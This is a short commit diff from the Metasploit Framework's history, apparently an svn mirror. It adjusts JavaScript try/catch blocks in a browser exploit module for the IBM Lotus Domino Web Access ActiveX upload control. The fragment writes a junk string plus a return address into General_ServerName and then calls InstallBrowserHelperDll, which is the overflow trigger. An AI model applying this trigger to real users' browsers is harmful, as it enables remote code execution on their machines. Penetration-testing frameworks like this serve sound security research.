Fixes for the JS try/catch from EB.
git-svn-id: file:///home/svn/framework3/trunk@5420 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7349c32ec9
commit
6a3ccc2955
|
@ -111,6 +111,8 @@ class Exploits::Windows::Browser::IBMLotusDomino_DWA_UploadModule < Msf::Exploit
|
|||
try {
|
||||
#{dwa7w}.General_ServerName = #{j_junk} + #{j_ret};
|
||||
#{dwa7w}.InstallBrowserHelperDll();
|
||||
} catch(err) {}
|
||||
try {
|
||||
#{inotes6}.General_ServerName = #{j_junk} + #{j_ret};
|
||||
#{inotes6}.InstallBrowserHelperDll();
|
||||
} catch(err) {}
|
||||
|
|
Loading…
Reference in New Issue